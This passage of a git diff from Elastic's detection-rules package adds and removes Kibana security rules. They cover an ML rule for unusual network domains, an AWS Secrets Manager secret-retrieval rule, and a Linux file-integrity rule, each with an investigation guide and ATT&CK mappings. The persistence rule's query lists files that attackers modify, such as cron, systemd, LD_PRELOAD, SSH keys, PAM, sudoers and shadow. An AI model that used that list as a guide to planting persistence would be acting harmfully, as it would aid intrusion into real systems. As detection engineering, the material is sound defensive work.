"timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "1719ee47-89b8-4407-9d55-6dff2629dd4c_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/17e68559-b274-4948-ad0b-f8415bb31126_108.json b/packages/security_detection_engine/kibana/security_rule/17e68559-b274-4948-ad0b-f8415bb31126_108.json new file mode 100644 index 00000000000..3c53ef0cd05 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17e68559-b274-4948-ad0b-f8415bb31126_108.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected an unusual network destination domain name. This can be due to initial access, persistence, command-and-control, or exfiltration activity. For example, when a user clicks on a link in a phishing email or opens a malicious document, a request may be sent to download and run a payload from an uncommon web server name. When malware is already running, it may send requests to an uncommon DNS domain the malware uses for command-and-control communication.", + "false_positives": [ + "Web activity that occurs rarely in small quantities can trigger this alert. Possible examples are browsing technical support or vendor URLs that are used very sparsely. A user who visits a new and unique web destination may trigger this alert when the activity is sparse. Web applications that generate URLs unique to a transaction may trigger this when they are used sparsely. Web domains can be excluded in cases such as these." + ], + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "packetbeat_rare_server_domain", + "name": "Unusual Network Destination Domain Name", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Network Destination Domain Name\n\nMachine learning models analyze network traffic to identify atypical domain names, which may indicate malicious activities like phishing or malware communication. Adversaries exploit uncommon domains for initial access or command-and-control. This detection rule leverages ML to flag these anomalies, aiding analysts in identifying potential threats early.\n\n### Possible investigation steps\n\n- Review the domain name flagged by the alert to determine if it is known for malicious activity or if it is newly registered, using threat intelligence sources and domain reputation services.\n- Analyze the network traffic associated with the domain to identify the source IP address and any related communication patterns, such as frequency and data volume.\n- Check the user or system that initiated the connection to the unusual domain for any recent changes or suspicious activities, such as software installations or configuration changes.\n- Investigate any related alerts or logs that might provide additional context, such as other unusual domain requests or failed login attempts, to identify potential patterns or correlations.\n- Assess the endpoint security logs for signs of malware or unauthorized access attempts that could be linked to the unusual domain activity.\n\n### False positive analysis\n\n- Legitimate software updates or downloads from uncommon domains can trigger false positives. Users should maintain a list of known software vendors and their associated domains to exclude these from alerts.\n- Internal testing or development environments may use non-standard domain names. Organizations should document these domains and configure exceptions to prevent unnecessary alerts.\n- Newly registered domains for legitimate business purposes might be flagged. Regularly update the list of approved domains as new business initiatives arise.\n- Third-party services or APIs that use unique domain names can cause false positives. Identify and whitelist these services to reduce noise in alerts.\n- Temporary or one-time use domains for events or campaigns should be monitored and excluded as needed to avoid repeated false positives.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further communication with the suspicious domain and potential spread of malware.\n- Conduct a thorough scan of the isolated system using updated antivirus and anti-malware tools to identify and remove any malicious software.\n- Review and analyze network logs to identify any other systems that may have communicated with the unusual domain and apply similar isolation and scanning procedures to those systems.\n- Change passwords and credentials associated with the affected system and any potentially compromised accounts to prevent unauthorized access.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional containment measures are necessary.\n- Implement network-level blocking of the identified unusual domain across the organization to prevent future access attempts.\n- Update threat intelligence feeds and detection systems with indicators of compromise (IOCs) related to the unusual domain to enhance future detection capabilities.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.18.0" + }, + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "risk_score": 21, + "rule_id": "17e68559-b274-4948-ad0b-f8415bb31126", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Auditd Manager\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required.\n", + "severity": "low", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 108 + }, + "id": "17e68559-b274-4948-ad0b-f8415bb31126_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/185c782e-f86a-11ee-9d9f-f661ea17fbce_3.json b/packages/security_detection_engine/kibana/security_rule/185c782e-f86a-11ee-9d9f-f661ea17fbce_3.json deleted file mode 100644 index aacb5b8e14a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/185c782e-f86a-11ee-9d9f-f661ea17fbce_3.json +++ /dev/null @@ -1,107 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule attempts to identify rapid secret retrieval attempts from AWS SecretsManager. Adversaries may attempt to retrieve secrets from the Secrets Manager programmatically using the `GetSecretValue` or `BatchGetSecretValue` API actions.", - "false_positives": [ - "Verify whether the user identity, user agent, and/or hostname should be using GetSecretString or BatchGetSecretValue APIs for the specified SecretId. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-9m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Rapid Secret Retrieval Attempts from AWS SecretsManager", - "note": "## Triage and analysis\n\n### Investigating Rapid Secret Retrieval Attempts from AWS SecretsManager\n\nAWS Secrets Manager is a service that enables the replacement of hardcoded credentials in code, including passwords, with an API call to Secrets Manager to retrieve the secret programmatically.\n\nThis rule looks for the rapid retrieval of credentials using `GetSecretValue` or `BatchGetSecretValue` actions in Secrets Manager programmatically. This is a [Threshold](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-threshold-rule) rule indicating 20 or more successful attempts to retrieve a secret value from Secrets Manager by the same user identity within a short timespan.\n\n#### Possible investigation steps\n\n- Identify the account and its role in the environment, and inspect the related policy.\n- Identify the applications that should use this account.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Investigate abnormal values in the `user_agent.original` field by comparing them with the intended and authorized usage and historical data. Suspicious user agent values include non-SDK, AWS CLI, custom user agents, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Review IAM permission policies for the user identity and specific secrets accessed.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher confidence. Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Rotate secrets or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.dataset:aws.cloudtrail and event.provider:secretsmanager.amazonaws.com and\n event.action: (GetSecretValue or BatchGetSecretValue) and event.outcome:success and\n not user_agent.name: (\"Chrome\" or \"Firefox\" or \"Safari\" or \"Edge\" or \"Brave\" or \"Opera\")\n", - "references": [ - "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", - "https://detectioninthe.cloud/ttps/credential_access/access_secret_in_secrets_manager/", - "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum", - "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_BatchGetSecretValue.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "user_agent.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "185c782e-f86a-11ee-9d9f-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Secrets Manager", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1555", - "name": "Credentials from Password Stores", - "reference": "https://attack.mitre.org/techniques/T1555/", - "subtechnique": [ - { - "id": "T1555.006", - "name": "Cloud Secrets Management Stores", - "reference": "https://attack.mitre.org/techniques/T1555/006/" - } - ] - } - ] - } - ], - "threshold": { - "field": [ - "user.id" - ], - "value": 20 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 3 - }, - "id": "185c782e-f86a-11ee-9d9f-f661ea17fbce_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/192657ba-ab0e-4901-89a2-911d611eee98_10.json b/packages/security_detection_engine/kibana/security_rule/192657ba-ab0e-4901-89a2-911d611eee98_10.json new file mode 100644 index 00000000000..62dd6fe7c2b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/192657ba-ab0e-4901-89a2-911d611eee98_10.json @@ -0,0 +1,220 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages the File Integrity Monitoring (FIM) integration to detect file modifications of files that are commonly used for persistence on Linux systems. The rule detects modifications to files that are commonly used for cron jobs, systemd services, message-of-the-day (MOTD), SSH configurations, shell configurations, runtime control, init daemon, passwd/sudoers/shadow files, Systemd udevd, and XDG/KDE autostart entries. To leverage this rule, the paths specified in the query need to be added to the FIM policy in the Elastic Security app.", + "from": "now-9m", + "index": [ + "logs-fim.event-*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Persistence via File Modification", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Persistence via File Modification\n\nFile Integrity Monitoring (FIM) is crucial for detecting unauthorized changes to critical files, often targeted by adversaries for persistence. Attackers may modify cron jobs, systemd services, or shell configurations to maintain access or escalate privileges. The detection rule monitors these files for updates, flagging potential persistence attempts by identifying suspicious modifications outside normal operations.\n\n### Possible investigation steps\n\n- Review the file path from the alert to determine which specific file was modified and assess its role in the system, focusing on paths commonly used for persistence such as cron jobs, systemd services, or shell configurations.\n- Check the timestamp of the modification event to correlate it with any known legitimate changes or scheduled maintenance activities, ensuring the modification was not part of normal operations.\n- Investigate the user or process responsible for the modification by examining the associated user ID or process ID, and verify if the user or process has legitimate reasons to alter the file.\n- Analyze recent login and session activity for the user or process involved in the modification to identify any unusual patterns or unauthorized access attempts.\n- Cross-reference the modification event with other security logs or alerts to identify any related suspicious activities, such as privilege escalation attempts or unauthorized access to sensitive files.\n- If the modified file is a configuration file, review its contents for any unauthorized or suspicious entries that could indicate persistence mechanisms, such as new cron jobs or altered systemd service configurations.\n\n### False positive analysis\n\n- Routine system updates or package installations may modify files monitored by the rule, such as those in /etc/cron.d or /etc/systemd/system. To manage these, consider excluding specific file paths or extensions like dpkg-new and dpkg-remove during known maintenance windows.\n- User-specific configuration changes, such as updates to shell profiles in /home/*/.bashrc, can trigger alerts. Implement exceptions for user directories where frequent legitimate changes occur, ensuring these are well-documented and reviewed regularly.\n- Automated scripts or management tools that update system configurations, like /etc/ssh/sshd_config, can cause false positives. Identify these tools and create exceptions for their expected file modification patterns.\n- Temporary files created during system operations, such as /var/spool/cron/crontabs/tmp.*, may be flagged. Exclude these temporary paths to reduce noise while maintaining security oversight.\n- Regular updates to known_hosts files in /home/*/.ssh/known_hosts can be mistaken for suspicious activity. Exclude these files from monitoring to prevent unnecessary alerts while ensuring SSH configurations are still monitored.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the attacker.\n- Review the specific file modifications flagged by the alert to determine if they are unauthorized or malicious. Restore any altered files to their last known good state using backups or system snapshots.\n- Change all passwords and SSH keys associated with the affected system to prevent unauthorized access using compromised credentials.\n- Conduct a thorough scan of the system for additional indicators of compromise, such as unauthorized user accounts or unexpected running processes, and remove any malicious artifacts found.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems may be affected.\n- Implement additional monitoring on the affected system and similar systems to detect any further unauthorized file modifications or suspicious activities.\n- Review and update access controls and permissions on critical files and directories to minimize the risk of unauthorized modifications in the future.", + "query": "file where host.os.type == \"linux\" and event.dataset == \"fim.event\" and event.action == \"updated\" and\nfile.path : (\n // cron, anacron & at\n \"/etc/cron.d/*\", \"/etc/cron.daily/*\", \"/etc/cron.hourly/*\", \"/etc/cron.monthly/*\",\n \"/etc/cron.weekly/*\", \"/etc/crontab\", \"/var/spool/cron/crontabs/*\", \"/etc/cron.allow\",\n \"/etc/cron.deny\", \"/var/spool/anacron/*\", \"/var/spool/cron/atjobs/*\",\n\n // systemd services & timers\n \"/etc/systemd/system/*\", \"/usr/local/lib/systemd/system/*\", \"/lib/systemd/system/*\",\n \"/usr/lib/systemd/system/*\", \"/home/*/.config/systemd/user/*\", \"/home/*/.local/share/systemd/user/*\",\n \"/root/.config/systemd/user/*\", \"/root/.local/share/systemd/user/*\",\n\n // LD_PRELOAD\n \"/etc/ld.so.preload\", \"/etc/ld.so.conf.d/*\", \"/etc/ld.so.conf\",\n\n // Dynamic linker\n \"/lib/ld-linux*.so*\", \"/lib64/ld-linux*.so*\", \"/usr/lib/ld-linux*.so*\", \"/usr/lib64/ld-linux*.so*\",\n\n // message-of-the-day (MOTD)\n \"/etc/update-motd.d/*\",\n\n // SSH\n \"/home/*/.ssh/*\", \"/root/.ssh/*\", \"/etc/ssh/*\",\n\n // system-wide shell configurations\n \"/etc/profile\", \"/etc/profile.d/*\", \"/etc/bash.bashrc\", \"/etc/zsh/*\", \"/etc/csh.cshrc\",\n \"/etc/csh.login\", \"/etc/fish/config.fish\", \"/etc/ksh.kshrc\",\n\n // root and user shell configurations\n \"/home/*/.profile\", \"/home/*/.bashrc\", \"/home/*/.bash_login\", \"/home/*/.bash_logout\",\n \"/root/.profile\", \"/root/.bashrc\", \"/root/.bash_login\", \"/root/.bash_logout\",\n \"/home/*/.zprofile\", \"/home/*/.zshrc\", \"/root/.zprofile\", \"/root/.zshrc\",\n \"/home/*/.cshrc\", \"/home/*/.login\", \"/home/*/.logout\", \"/root/.cshrc\", \"/root/.login\", \"/root/.logout\",\n \"/home/*/.config/fish/config.fish\", \"/root/.config/fish/config.fish\",\n \"/home/*/.kshrc\", \"/root/.kshrc\",\n\n // Alias files\n \"/home/*/.bash_aliases\", \"/root/.bash_aliases\", \"/home/*/.zsh_aliases\", \"/root/.zsh_aliases\",\n \"/home/*/.aws/cli/alias\", \"/root/.aws/cli/alias\", \n\n // runtime control\n \"/etc/rc.common\", \"/etc/rc.local\",\n\n // System V init/Upstart\n \"/etc/init.d/*\", \"/etc/init/*\",\n\n // passwd/sudoers/shadow\n \"/etc/passwd\", \"/etc/shadow\", \"/etc/sudoers\", \"/etc/sudoers.d/*\",\n\n // Systemd udevd\n \"/lib/udev/*\", \"/etc/udev/rules.d/*\", \"/usr/lib/udev/rules.d/*\", \"/run/udev/rules.d/*\", \"/usr/local/lib/udev/rules.d/*\",\n\n // XDG/KDE autostart entries\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\", \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n\n // LKM configuration files\n \"/etc/modules\", \"/etc/modprobe.d/*\", \"/usr/lib/modprobe.d/*\", \"/etc/modules-load.d/*\",\n \"/run/modules-load.d/*\", \"/usr/local/lib/modules-load.d/*\", \"/usr/lib/modules-load.d/*\",\n\n // PAM modules & configuration files\n \"/lib/security/*\", \"/lib64/security/*\", \"/usr/lib/security/*\", \"/usr/lib64/security/*\",\n \"/lib/x86_64-linux-gnu/security/*\", \"/usr/lib/x86_64-linux-gnu/security/*\",\n \"/etc/pam.d/*\", \"/etc/security/pam_*\", \"/etc/pam.conf\",\n\n // Polkit Rule files\n \"/etc/polkit-1/rules.d/*\", \"/usr/share/polkit-1/rules.d/*\",\n\n // Polkit pkla files\n \"/etc/polkit-1/localauthority/*\", \"/var/lib/polkit-1/localauthority/*\",\n\n // Polkit Action files\n \"/usr/share/polkit-1/actions/*\",\n\n // Polkit Legacy paths\n \"/lib/polkit-1/rules.d/*\", \"/lib64/polkit-1/rules.d/*\", \"/var/lib/polkit-1/rules.d/*\",\n\n // NetworkManager\n \"/etc/NetworkManager/dispatcher.d/*\",\n\n // D-bus Service files\n \"/usr/share/dbus-1/system-services/*\", \"/etc/dbus-1/system.d/*\",\n \"/lib/dbus-1/system-services/*\", \"/run/dbus/system.d/*\",\n \"/home/*/.local/share/dbus-1/services/*\", \"/home/*/.dbus/session-bus/*\",\n \"/usr/share/dbus-1/services/*\", \"/etc/dbus-1/session.d/*\",\n\n // GRUB\n \"/etc/default/grub.d/*\", \"/etc/default/grub\", \"/etc/grub.d/*\", \"/boot/grub2/grub.cfg\",\n \"/boot/grub/grub.cfg\", \"/boot/efi/EFI/*/grub.cfg\", \"/etc/sysconfig/grub\",\n\n // Dracut\n \"/lib/dracut/modules.d/*\", \"/usr/lib/dracut/modules.d/*\",\n\n // Misc.\n \"/etc/shells\"\n\n) and not (\n file.path : (\n \"/var/spool/cron/crontabs/tmp.*\", \"/run/udev/rules.d/*rules.*\", \"/home/*/.ssh/known_hosts.*\", \"/root/.ssh/known_hosts.*\"\n ) or\n file.extension in (\"dpkg-new\", \"dpkg-remove\", \"SEQ\")\n)\n", + "references": [ + "https://www.elastic.co/security-labs/primer-on-persistence-mechanisms", + "https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms", + "https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms", + "https://www.elastic.co/security-labs/approaching-the-summit-on-persistence", + "https://www.elastic.co/security-labs/the-grand-finale-on-linux-persistence", + "https://slayer0x.github.io/awscli/" + ], + "related_integrations": [ + { + "package": "fim", + "version": "^1.16.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "192657ba-ab0e-4901-89a2-911d611eee98", + "setup": "## Setup\n\nThis rule requires data coming in from the Elastic File Integrity Monitoring (FIM) integration.\n\n### Elastic FIM Integration Setup\nTo configure the Elastic FIM integration, follow these steps:\n\n1. Install and configure the Elastic Agent on your Linux system. You can refer to the [Elastic Agent documentation](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html) for detailed instructions.\n2. Once the Elastic Agent is installed, navigate to the Elastic Security app in Kibana.\n3. In the Kibana home page, click on \"Integrations\" in the left sidebar.\n4. Search for \"File Integrity Monitoring\" in the search bar and select the integration.\n5. Provide a name and optional description for the integration.\n6. Select the appropriate agent policy for your Linux system or create a new one.\n7. Configure the FIM policy by specifying the paths that you want to monitor for file modifications. You can use the same paths mentioned in the `query` field of the rule. Note that FIM does not accept wildcards in the paths, so you need to specify the exact paths you want to monitor.\n8. Save the configuration and the Elastic Agent will start monitoring the specified paths for file modifications.\n\nFor more details on configuring the Elastic FIM integration, you can refer to the [Elastic FIM documentation](https://docs.elastic.co/integrations/fim).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: File Integrity Monitoring", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + }, + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + }, + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 10 + }, + "id": "192657ba-ab0e-4901-89a2-911d611eee98_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/19de8096-e2b0-4bd8-80c9-34a820813fff_212.json b/packages/security_detection_engine/kibana/security_rule/19de8096-e2b0-4bd8-80c9-34a820813fff_212.json new file mode 100644 index 00000000000..eb18e9ccd70 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/19de8096-e2b0-4bd8-80c9-34a820813fff_212.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected an unusual error in a CloudTrail message. These can be byproducts of attempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection.", + "false_positives": [ + "Rare and 